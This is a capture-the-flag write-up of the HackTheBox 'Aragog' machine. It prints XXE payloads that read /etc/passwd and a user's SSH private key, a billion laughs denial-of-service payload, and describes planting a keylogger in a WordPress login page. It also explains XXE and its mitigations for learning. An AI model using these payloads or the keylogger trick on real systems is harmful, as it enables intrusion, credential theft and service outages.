Aragog was a delightful challenge on HackTheBox. It’s up there as one of my favourites so far!

To complete this box, I got a shell by exploiting an XML External Entity (XXE) vulnerability and lifting the SSH key file of a user. Once logged in, I discovered a hidden WordPress site containing a few clues. I then created a simple keylogger to capture the password of a user logging in to the WordPress site and, thanks to some password reuse, was able to escalate to root.

Hacking the box

  1. Enumeration
  2. Exploitation
  3. Privilege escalation
  4. Deconstructing the hack


Enumeration

I start with an nmap scan.

[email protected]:~/htb/aragog# nmap -sV -sC -oA aragog
Starting Nmap 7.70 ( ) at 2018-07-21 19:14 AEST
Nmap scan report for
Host is up (0.31s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 52.85 seconds

The scan shows us that we have FTP and HTTP open, as well as the regular SSH.

Starting with the web server, I throw the IP into a browser and take a look. All I get is the default Apache2 index.html.


I run dirbuster, and it reveals hosts.php.

Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /icons/ - 403
Dir found: /icons/small/ - 403
File found: /wp-login.php - 500
File found: /hosts.php - 200

I browse to it and take a look. An interesting little web app. It looks like it calculates the number of hosts in a subnet, but there doesn’t seem to be any way to feed it any network/subnet information.

I decide to move on and poke at the FTP server. The first thing I try is logging in anonymously.

[email protected]:~/htb/aragog# ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Success! Listing the directory shows a single file - test.txt.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.

So naturally, I download it.

ftp> get test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (86 bytes).
226 Transfer complete.
86 bytes received in 0.00 secs (66.5486 kB/s)

The contents of test.txt appear to be XML.

[email protected]:~/htb/aragog# cat test.txt 
[email protected]:~/htb/aragog# 

The information inside this XML document looks like it could be related to what the hosts.php page is displaying. To find out, I send the XML file over to the page to see what happens.

[email protected]:~/htb/aragog# curl -X POST -d @test.txt

There are 62 possible hosts for

[email protected]:~/htb/aragog# 
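As an aside, 62 is what the usual host-count formula gives for a subnet with 6 host bits. Here is a minimal Python sketch of that arithmetic. The mask 255.255.255.192 and the formula itself are my assumptions: the source of hosts.php isn't shown, and this is just one calculation that lands on the same number.

```python
def usable_hosts(netmask: str) -> int:
    """Return the number of usable host addresses for a dotted-quad netmask."""
    octets = [int(part) for part in netmask.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not a dotted-quad netmask: {netmask!r}")
    mask = int.from_bytes(bytes(octets), "big")
    # Every bit that is not set in the mask is available for host addresses.
    host_bits = 32 - bin(mask).count("1")
    # Subtract the network and broadcast addresses.
    # (This sketch ignores the /31 and /32 special cases.)
    return 2 ** host_bits - 2


# Assumed example mask (a /26), not taken from test.txt.
print(usable_hosts("255.255.255.192"))
```

With the same formula, a mask with no bits set at all would leave 32 host bits, which is 2^32 - 2 = 4294967294.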

It looks like I’m doing XML injection today! One small problem though. I don’t know anything about XML injection.


Exploitation

After a few hours of googling XML vulnerabilities, I learn about a technique called XML External Entities (XXE), which is sitting at #4 on the 2017 OWASP Top 10.

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when a weakly configured XML parser processes XML input containing a reference to an external entity. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

It seems that if this web server is vulnerable to XXE, I should be able to manipulate the XML file to reference an entity that is external to the XML document, such as a local file on the system.

I look at some example XML documents that exploit XXE, modify the XML in test.txt and save the file as totallylegit.xml.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>


If this works, it should return the contents of /etc/passwd. I throw the XML containing XXE at hosts.php and see what happens.

[email protected]:~/htb/aragog# curl -X POST -d @totallylegit.xml

There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:123:130:ftp daemon,,,:/srv/ftp:/bin/false

I rerun the command and grep for /bin/bash to find all users with access to a shell.

[email protected]:~/htb/aragog# curl -X POST -d @totallylegit.xml | grep /bin/bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2681  100  2487  100   194   3953    308 --:--:-- --:--:-- --:--:--  4262
There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash
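The same filtering can be done on the passwd format itself rather than with a plain text match. This is a small Python sketch, assuming the response body is the hosts.php sentence followed directly by the file contents, as in the output above. The function name and the sample user `alice` are made up for illustration.

```python
def shell_users(passwd_text: str, shell: str = "/bin/bash") -> list[str]:
    """Return the account names whose login shell equals `shell`."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.strip().split(":")
        # A passwd entry has exactly seven colon-separated fields.
        if len(fields) != 7 or not fields[0].strip():
            continue
        if fields[6] == shell:
            # The first line carries the "There are N possible hosts for "
            # prefix, so keep only the last word of the name field.
            users.append(fields[0].split()[-1])
    return users


sample = (
    "There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash\n"
    "ftp:x:123:130:ftp daemon,,,:/srv/ftp:/bin/false\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"  # hypothetical user
)
print(shell_users(sample))
```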

To recap, at this point I have:
- two accounts with shell access
- an open SSH port
- a method to read files on disk.

Time to get dem’ SSH keys!

I craft a new XML document and save it as florian-key.xml.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///home/florian/.ssh/id_rsa" >]>


I throw this one at hosts.php and redirect the output to ./florian.key.

[email protected]:~/htb/aragog# curl -X POST -d @florian-key.xml > florian.key                                                         
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                                                          
                                 Dload  Upload   Total   Spent    Left  Speed
100  1933  100  1725  100   208   2751    331 --:--:-- --:--:-- --:--:--  3082    

After a little clean up, I’ve got an RSA key for florian.
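The clean up is just a matter of cutting away everything that isn't the key, since the response starts with the hosts.php sentence. A rough Python sketch of that step follows. It assumes the key is in the traditional PEM format with `BEGIN RSA PRIVATE KEY` markers, and the function name is my own.

```python
BEGIN = "-----BEGIN RSA PRIVATE KEY-----"
END = "-----END RSA PRIVATE KEY-----"


def extract_pem(response: str) -> str:
    """Return only the PEM block from a response that wraps it in other text."""
    start = response.find(BEGIN)
    end = response.find(END, start)
    if start == -1 or end == -1:
        raise ValueError("no RSA private key block found in response")
    # Keep everything from the BEGIN marker through the END marker,
    # and finish with a newline, which ssh expects.
    return response[start:end + len(END)] + "\n"


# Made-up response body; "AAAA" stands in for the base64 key material.
raw = "There are 4294967294 possible hosts for " + BEGIN + "\nAAAA\n" + END + "\n\n"
print(extract_pem(raw), end="")
```

The result can be written to florian.key before running chmod and ssh.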


I try the same thing for cliff but no luck. I can’t read cliff’s RSA key. 😪 Not to worry, I move on and get a shell on Aragog.

[email protected]:~/htb/aragog# chmod 400 florian.key
[email protected]:~/htb/aragog# ssh [email protected] -i florian.key 
Last login: Sat Jul 21 03:13:11 2018 from
[email protected]:~$ 

User shell obtained!

Privilege escalation

The first thing I always do when I get a shell is to start enumerating the system. I start with the web directory to see if any files/folders were not picked up in the dirbuster scan.

[email protected]:/var/www/html$ ls -l
total 24
drwxrwxrwx 5 cliff    cliff     4096 Jul 21 03:30 dev_wiki
-rw-r--r-- 1 www-data www-data   689 Dec 21  2017 hosts.php
-rw-r--r-- 1 www-data www-data 11321 Dec 18  2017 index.html
drw-r--r-- 5 cliff    cliff     4096 Dec 20  2017 zz_backup
[email protected]:/var/www/html$ 

Unfortunately, I don’t have permissions to see the contents of the zz_backup directory.

[email protected]:/var/www/html$ cd zz_backup/
-bash: cd: zz_backup/: Permission denied

I instead browse to /dev_wiki, but I get redirected to the hostname of the machine.

To fix that, I simply add the IP of Aragog to my hosts file.

[email protected]:~/htb/aragog# echo " aragog" >> /etc/hosts


I browse around the blog and see a post that looks interesting.

From this post, I notice two critical pieces of information.

  1. … probably be restoring the site from backup fairly frequently!

  2. I’ll be logging in regularly…

Cliff is logging in and running backups on a regular basis. More importantly, this is an administrative task that I may be able to abuse to escalate privilege.

I try to see if cliff has anything scheduled, like a backup task.

[email protected]:/dev/shm$ crontab -u cliff -l
must be privileged to use -u
[email protected]:/dev/shm$ 

No luck. Time to get sneaky.

To find out exactly what cliff is doing, I create and run a simple process monitor shell script. This script watches the list of running processes and displays any new processes that start.


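#!/bin/bash

# Take an initial snapshot of the running commands
old_process=$(ps -eo command)

while true; do
  new_process=$(ps -eo command)
  # Lines marked > are new processes, lines marked < have exited
  diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
  sleep 1
  # Compare against the latest snapshot on the next pass
  old_process=$new_process
done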
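For comparison, here is the same idea as a Python sketch: take two snapshots of the process list and report what differs. The function names are mine. Because it uses sets, two processes with an identical command line count as one, which is good enough for spotting a cron job.

```python
import subprocess
import time


def snapshot() -> set[str]:
    """Return the set of command lines currently reported by ps."""
    result = subprocess.run(
        ["ps", "-eo", "command"], capture_output=True, text=True, check=True
    )
    # Drop the header row that ps prints first.
    return set(result.stdout.splitlines()[1:])


def diff_snapshots(old: set[str], new: set[str]) -> tuple[list[str], list[str]]:
    """Return (started, stopped) command lines between two snapshots."""
    return sorted(new - old), sorted(old - new)


def watch(interval: float = 1.0) -> None:
    """Print processes as they appear (>) and disappear (<) until interrupted."""
    old = snapshot()
    while True:
        time.sleep(interval)
        new = snapshot()
        started, stopped = diff_snapshots(old, new)
        for command in started:
            print(">", command)
        for command in stopped:
            print("<", command)
        old = new
```

Calling `watch()` starts the loop, and Ctrl+C stops it.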

I monitor the processes for a little while and eventually get a hit. I capture a cron job that runs a Python script from cliff’s home directory to log cliff into the WordPress blog, as well as a restore script aimed at the wiki. This is exactly what the blog post said would be happening.

/usr/sbin/CRON -f
< /bin/sh -c /usr/bin/python /home/cliff/
< /bin/sh -c /bin/bash /root/
< /usr/bin/python /home/cliff/
< /bin/bash /root/
< rm -rf /var/www/html/dev_wiki/

Although I can’t access the script in cliff’s home directory, I can access the WordPress login page located at /var/www/html/dev_wiki/wp-login.php. A simple keylogger will do the trick!

I browse to wp-login.php in my browser and view the source. I make a note of the name property on the password input field.

I edit wp-login.php and add some PHP code to the top of the file that writes the value entered into the password field out to /dev/shm/totallynotapassword.txt.

After waiting a little bit for the cron job to execute and cliff to log in again, I check for the loot.

[email protected]:/var/www/html/dev_wiki$ cat /dev/shm/totallynotapassword.txt 

Password obtained!

Armed with the password, I try to switch user to cliff.

[email protected]:/var/www/html/dev_wiki$ su - cliff
su: Authentication failure


How about root?

[email protected]:/var/www/html/dev_wiki$ su - root
[email protected]:~# 

Deconstructing the hack


The vulnerability exploited in this challenge has been around for a while, but it’s making a solid comeback. The Open Web Application Security Project (OWASP) ranks this vulnerability as #4 on their Top 10 for 2017, not simply because of its impact, but also because of its likelihood and how commonly it has been exploited in reported breaches.

The problem was first reported as early as 2002 but was not widely addressed until 2008. The vulnerability is still present today, and OWASP has seen a rise in its exploitation, resulting in it making the Top 10 list for 2017. The previous OWASP Top 10, which came out in 2013, did not include XXE.

In 2014, it was reported that an XXE vulnerability was found to affect all versions of WordPress and Drupal CMS platforms, as well as several Joomla extensions. It is said the exposure of the vulnerability endangered more than 250 million websites as a conservative guess, or more than a quarter of the entire internet’s website population at that time.

How it works

What are XML external entities?

XML can be thought of as a language that is used to describe data. This enables two systems running on different technologies to communicate and exchange data with one another.

The example below is a sample XML document which describes a pet. The name, breed and age are called XML Elements.

<?xml version="1.0"?>
    <name>Fluffy, Destroyer of Worlds</name>

XML documents can also contain something called entities, which are defined using a system identifier in the DOCTYPE header. Entities can access local or remote content.

The example below is a sample XML document that contains XML entities.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE pets [ <!ELEMENT pets ANY >
<!ENTITY petName SYSTEM "file:///folder/pet1.txt" >]>


In the code above, the entity petName is defined with the system identifier file:///folder/pet1.txt. The keyword SYSTEM instructs the parser that the entity value should be read from the URI that follows. When the XML is parsed, each reference to the entity is replaced with that value. This can be very useful when a web application needs to refer to an entity value many times.
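To see the substitution happen, here is a small Python sketch using the standard library parser. It deliberately uses an internal entity (a literal string) rather than a SYSTEM one, because Python's ElementTree is documented as not expanding external entities. The element names `pet`, `name` and `greeting` are my own for the demo.

```python
import xml.etree.ElementTree as ET

DOC = """<?xml version="1.0"?>
<!DOCTYPE pet [
  <!ENTITY petName "Fluffy, Destroyer of Worlds">
]>
<pet>
  <name>&petName;</name>
  <greeting>Hello, &petName;!</greeting>
</pet>"""

# The parser replaces every &petName; reference with the entity's value.
root = ET.fromstring(DOC)
print(root.find("name").text)
print(root.find("greeting").text)
```

The entity is defined once and used twice, and both references come back expanded. A SYSTEM entity works the same way on a parser that resolves it, except that the value comes from the URI.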

What is an XXE attack?

As demonstrated above, using XML entities and the SYSTEM keyword causes an XML parser to read data from a URI and substitute it within the document. This means that an attacker can supply their own URI and force the application to display whatever it points to.

The example below is the XML document that I used to retrieve the SSH key of the florian user on Aragog.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///home/florian/.ssh/id_rsa" >]>


Here you can see I’m using the SYSTEM keyword to reference the URI of a file on the local disk. The XML parser reads the file, and displays it back to the user.

Known use cases

XML entities were also notably used in a Denial of Service (DoS) attack called the billion laughs attack, where the payload defines entities that repeatedly reference one another.

The example below defines 10 entities, each one after the first consisting of 10 copies of the previous entity. When the XML processor on the receiving server expands the last entity, it ends up with one billion copies of the first. The server consumes all available resources attempting to do so, resulting in denial of service.

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
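The numbers are easy to check without expanding anything. This Python sketch only does the arithmetic: nine levels of entities, each referencing the previous one ten times, on top of the three-byte string "lol". The function name and parameters are mine.

```python
def expanded_size(base: str = "lol", fanout: int = 10, levels: int = 9) -> tuple[int, int]:
    """Return (copies of base, total bytes) after full entity expansion."""
    # Each level multiplies the number of copies by the fan-out.
    copies = fanout ** levels
    return copies, copies * len(base.encode("utf-8"))


copies, size = expanded_size()
print(f"{copies:,} copies, about {size / 1e9:.1f} GB")
```

So a document of well under a kilobyte asks the parser to hold roughly 3 GB of text.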


Developer training is essential to identify and mitigate XXE. Besides that, preventing XXE requires:

If these controls are not possible, consider using virtual patching, API security gateways, or Web Application Firewalls (WAFs) to detect, monitor, and block XXE attacks.
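One control that is commonly recommended is to refuse documents that declare a DOCTYPE at all, since both the XXE payloads and the billion laughs payload need one. Here is a rough Python sketch of that idea using the standard library expat bindings. The `DTDForbidden` and `safe_fromstring` names are my own, and this illustrates the approach rather than providing a hardened parser.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when a document declares a DOCTYPE."""


def _forbid_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this handler as soon as it sees <!DOCTYPE ...>,
    # before any entity declaration is processed.
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")


def safe_fromstring(xml_text: str) -> ET.Element:
    """Parse XML, but reject any document that contains a DOCTYPE."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _forbid_doctype
    checker.Parse(xml_text, True)
    # Only documents without a DTD reach the real parser.
    return ET.fromstring(xml_text)
```

A plain document such as `<pet><name>Fluffy</name></pet>` parses as normal, while anything starting with `<!DOCTYPE foo [ ... ]>` raises `DTDForbidden` before an entity is ever defined.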